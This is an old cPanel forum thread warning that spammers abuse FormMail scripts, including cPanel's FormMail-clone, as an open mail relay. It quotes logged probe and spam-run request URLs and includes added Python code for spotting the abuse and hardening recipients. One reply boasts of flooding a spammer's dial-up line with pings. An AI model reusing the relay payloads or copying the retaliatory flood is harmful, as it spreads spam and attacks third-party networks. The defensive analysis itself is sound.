The Community Forums

Interact with an entire community of cPanel & WHM users!

Spam attack alert <important!>

Discussion in 'General Discussion' started by kosmo, Jan 24, 2002.

  1. kosmo

    Hi all,

    this belongs to "Backend/Scripts" but it is too serious to hide it there.

    While studying the logs of the main account of my dedicated server, I noticed some kind of automaton scanning for /cgi-bin/formmail.pl (I am referring to the old Analog reporting):


    66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&recipient=mailrelay@ort-r01.mx.aol.com&subject=P80+<my_ip_here>+35
    54: : Nov/ 2/01 9:03 AM: /cgi-bin/formmail.pl?email=eroticascanner@aol.com&recipient=Siemensv2@aol.com&subject=<domain_name_here>/cgi-bin/formmail.pl&msg=Hiya
    35: : Jan/ 7/02 2:42 AM: /cgi-bin/formmail.pl?email=cashwarstest@cashwars.com&subject=<another_domain_name_here>/cgi-bin/formmail.pl&recipient=black123@aol.com&msg=testing
    30: : Oct/11/01 11:33 AM: /cgi-bin/formmail.pl?email=WebBrowserHunter@aol.com&recipient=infam0uskills@aol.com&subject=<some_other_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
    28: : Oct/31/01 6:59 PM: /cgi-bin/formmail.pl?email=WebBrowserHunter@aol.com&recipient=shinxstar@aol.com&subject=<yet_another_domain_name_here>/cgi-bin/formmail.pl&msg=scanning

    and so on, and so on (hundreds of them).

    Some of them directly try to send:
    13: : Jan/ 1/02 1:47 AM: /cgi-bin/formmail.pl?email=Alison20F@hotmail.com&recipient=bslab@hotmail.com,bslack@hotmail.com,bslacy@earthlink.net,bslade@hotmail.com,bslady2@hotmail.com,bslady@hotmail.com,bslagel@earthlink.net,bslager@hotmail.com,bslagowski@hotmail.com,bslagter@hotmail.com&subject=Download The Napster Of Porn!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
    13: : Jan/ 1/02 12:26 AM: /cgi-bin/formmail.pl?email=Sarah18@yahoo.com&recipient=brianz54@hotmail.com,brianz71@hotmail.com,brianz7@hotmail.com,brianz8@hotmail.com,brianz@hotmail.com,brianza@earthlink.net,brianza@hotmail.com,brianzam@hotmail.com,brianzan@hotmail.com,brianze@hotmail.com&subject=FREE XXX PORN!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
    13: : Jan/ 1/02 12:29 AM: /cgi-bin/formmail.pl?email=Jenny19Sexxy@angelfire.com&recipient=brickwall_1@hotmail.com,brickwall_2@hotmail.com,brickwall_of_the_brickhouse@msn.com,brickwalls@hotmail.com,brickwell@hotmail.com,brickwindows@hotmail.com,brickwoman@hotmail.com,brickwood@earthlink.net,brickwood@hotmail.com,brickwork@hotmail.com&subject=View My Webcam!&message=Want+instant+access+to+thousands+of+high+quality+adult+movies?++We've+got+celebrities,+lesbians,+hardcore,+fetish,+gay,+or+whatever+you+want.++You+don't+even+need+a+credit+card,+just+a+connection+to+the+internet.+http://209.202.218.10/dc/dialer+-+Click+here+to+download+the+napster+of+hardcore+entertainment!


    I have then tried one of the last lines with /cgi-sys/FormMail-clone.cgi AND IT WORKS! The spam is being sent through my own server! So, it is a matter of weeks, maybe months, and the spammers WILL know that they just have to replace /cgi-bin/formmail.pl with /cgi-sys/FormMail-clone.cgi and they will be able to spam through any CPanel machine.

    As far as I know, there is a more secure version of formmail, checking if the requesting document is stored on the server before proceeding with sending the email. Does anybody know for sure? Has anybody else noticed this kind of spam attack?

    kosmo
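The probes and spam runs quoted above are easy to pick out of a log once the `recipient` parameter is compared against the domains the server actually hosts: a single outside mailbox on one request is the scanner reporting a working relay back to itself (the first line above mails the server's own IP to an AOL mailbox), many outside mailboxes on one request is a spam run. The following is an added example, not part of the original post and not cPanel code; it runs that comparison over constructed lines in the same Analog request-report shape. `HOSTED_DOMAINS` and the sample lines are assumptions, with the spam address lists shortened.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption for the example: the domains this server hosts mail for.
HOSTED_DOMAINS = {"example.com", "example.org"}

# Constructed sample, in the Analog request-report shape quoted in the post:
# "<hits>: : <date>: <request>". Addresses are shortened stand-ins.
SAMPLE_LOG = """\
66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&recipient=mailrelay@ort-r01.mx.aol.com&subject=P80+192.0.2.10+35
30: : Oct/11/01 11:33 AM: /cgi-bin/formmail.pl?email=WebBrowserHunter@aol.com&recipient=infam0uskills@aol.com&subject=example.com/cgi-bin/formmail.pl&msg=scanning
13: : Jan/ 1/02 1:47 AM: /cgi-bin/formmail.pl?email=Alison20F@hotmail.com&recipient=bslab@hotmail.com,bslack@hotmail.com,bslacy@earthlink.net&subject=Free+Membership&message=You+Have+Won
9: : Jan/ 2/02 3:00 PM: /cgi-sys/FormMail-clone.cgi?email=x@hotmail.com&recipient=a@hotmail.com,b@hotmail.com&subject=hi&message=hi
5: : Jan/ 3/02 9:15 AM: /cgi-bin/formmail.pl?email=visitor@aol.com&recipient=sales@example.com&subject=Question&message=Hello
2: : Jan/ 3/02 9:20 AM: /index.html
"""

# hits, date, request: the request always starts with "/", so the lazy date
# group stops at the first ": /" even though the date itself contains spaces.
LINE_RE = re.compile(r"^\s*(\d+): : (.+?): (/.*)$")


def recipients_of(query):
    """All addresses named by the form's recipient parameter (comma-separated)."""
    params = parse_qs(query, keep_blank_values=True)
    raw = ",".join(params.get("recipient", []))
    return [r.strip().lower() for r in raw.split(",") if r.strip()]


def classify(hits, date, request):
    """Return a finding for a formmail-style request, or None for any other URL."""
    url = urlsplit(request)
    if "formmail" not in url.path.lower():
        return None
    rcpts = recipients_of(url.query)
    foreign = [r for r in rcpts if r.rpartition("@")[2] not in HOSTED_DOMAINS]
    if not foreign:
        verdict = "ok"            # mail stays on this server's own domains
    elif len(rcpts) > 1:
        verdict = "spam run"      # bulk delivery to outside mailboxes
    else:
        verdict = "probe"         # one outside mailbox: a scanner testing the relay
    return {"hits": int(hits), "date": date, "script": url.path,
            "verdict": verdict, "foreign": foreign}


def analyze(log_text):
    """Findings for every formmail-style request in an Analog request report."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            finding = classify(*m.groups())
            if finding:
                findings.append(finding)
    return findings


def summarize(findings):
    """Verdict counts, hits that actually relayed mail, and which scripts were abused."""
    counts = {"ok": 0, "probe": 0, "spam run": 0}
    relayed_hits = 0
    scripts = set()
    for f in findings:
        counts[f["verdict"]] += 1
        if f["verdict"] != "ok":
            relayed_hits += f["hits"]
            scripts.add(f["script"])
    return {"counts": counts, "relayed_hits": relayed_hits,
            "abused_scripts": sorted(scripts)}


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f"{f['hits']:>4} {f['date']:<18} {f['verdict']:<9} {f['script']} {f['foreign']}")
    print(summarize(results))
```

Both script paths end up in the abused set, which is the point of the post: the clone in /cgi-sys is reached the same way as /cgi-bin/formmail.pl, so a report that only greps for one path misses half the traffic.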
     
  2. rpmws

    This one is old news...some punk kid has released a win32 client that scans IPs and domains for certain versions of FormMail.pl and others and looks for the hole. I caught 3 of these bastards. I tailed my mainlog and kept seeing 20-30 emails spit out every 2 seconds. I tracked down the IP and pinged it and found it was a 56K dialup account on Earthlink. I then blocked his class and threw an 80mbit ping at his IP which caused him to log off and back on. I flooded his dial up box so bad for 15 minutes that no one there could get through. But that was the stupid part. I just wanted to frustrate him. He kept trying so I called Earthlink ..got a tech and he watched the little bastard for 10 minutes with me. Then he shut him down. Turns out the emails linked him to some demented porn domain that had been shut off as well.

    All this stopped as soon as I upgraded my Matt's box wide script as well as telling all my clients to update theirs or I would fine them for Spam :) But you are right the problem is in the clone as well.
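On the "more secure version" question raised above: the check kosmo describes (is the submitting page on this server?) is a Referer check, and the Referer header is supplied by the client, so a bot can omit it or forge it. What actually closes the relay, and what an upgraded script has to enforce, is an explicit allow-list of recipients checked on every request. The block below is an added Python model of the two policies for illustration; it is not FormMail's code, the clone's code, or anything from cPanel. `Request`, `REFERERS` and `ALLOWED_RECIPIENTS` are assumptions, and the legacy branch models a script that skips the Referer check entirely when no header is sent, which is how formmail scripts of that era typically behaved.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Request:
    """Stand-in for the CGI environment: decoded form fields plus the Referer header."""
    form: Dict[str, str]
    referer: Optional[str] = None   # None when the client sent no Referer at all


# Assumptions for the example.
REFERERS = ["example.com"]                                  # hosts whose pages may submit the form
ALLOWED_RECIPIENTS = ["sales@example.com", "@example.org"]  # "@domain" = any mailbox at that domain


def split_recipients(value: str) -> List[str]:
    """Comma-separated recipient field, normalised to lowercase addresses."""
    return [r.strip().lower() for r in value.split(",") if r.strip()]


def referer_host(referer: str) -> str:
    return referer.split("://", 1)[-1].split("/", 1)[0].lower()


def referer_ok(referer: Optional[str]) -> bool:
    if not referer:
        return True   # legacy behaviour: no header, no check; the scanners simply send none
    host = referer_host(referer)
    return any(host == r or host.endswith("." + r) for r in REFERERS)


def legacy_policy(req: Request) -> Optional[List[str]]:
    """Vulnerable: trusts the client-supplied Referer and delivers to whatever
    recipient= names, so the script is an open mail relay. Returns the list the
    mail would go to, or None if the request is refused."""
    if not referer_ok(req.referer):
        return None
    rcpts = split_recipients(req.form.get("recipient", ""))
    return rcpts or None


def hardened_policy(req: Request) -> Optional[List[str]]:
    """Fixed: every recipient must match the allow-list, address or domain.
    The Referer is ignored for authorization; it is forgeable and often absent."""
    rcpts = split_recipients(req.form.get("recipient", ""))
    if not rcpts:
        return None
    for r in rcpts:
        domain = "@" + r.rpartition("@")[2]
        if r not in ALLOWED_RECIPIENTS and domain not in ALLOWED_RECIPIENTS:
            return None   # one bad recipient refuses the whole submission
    return rcpts


if __name__ == "__main__":
    cases = {
        "spam run, no Referer": Request({"recipient": "bslab@hotmail.com,bslack@hotmail.com"}),
        "probe, forged Referer": Request({"recipient": "mailrelay@aol.example"},
                                         referer="http://www.example.com/contact.html"),
        "legitimate form": Request({"recipient": "sales@example.com"},
                                   referer="http://www.example.com/contact.html"),
    }
    for name, req in cases.items():
        print(f"{name:24} legacy={legacy_policy(req)} hardened={hardened_policy(req)}")
```

Run as a script it shows the spam run and the forged-Referer probe going out under the legacy policy and being refused under the hardened one, while the legitimate contact form passes both. A domain-wide entry such as `@example.org` is convenient for a hosting box, but it is still an allow-list of places the server is willing to deliver to, which is the property the old Referer check never gave.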
     
  3. Brad

    So then what's the best way to address this right now?
     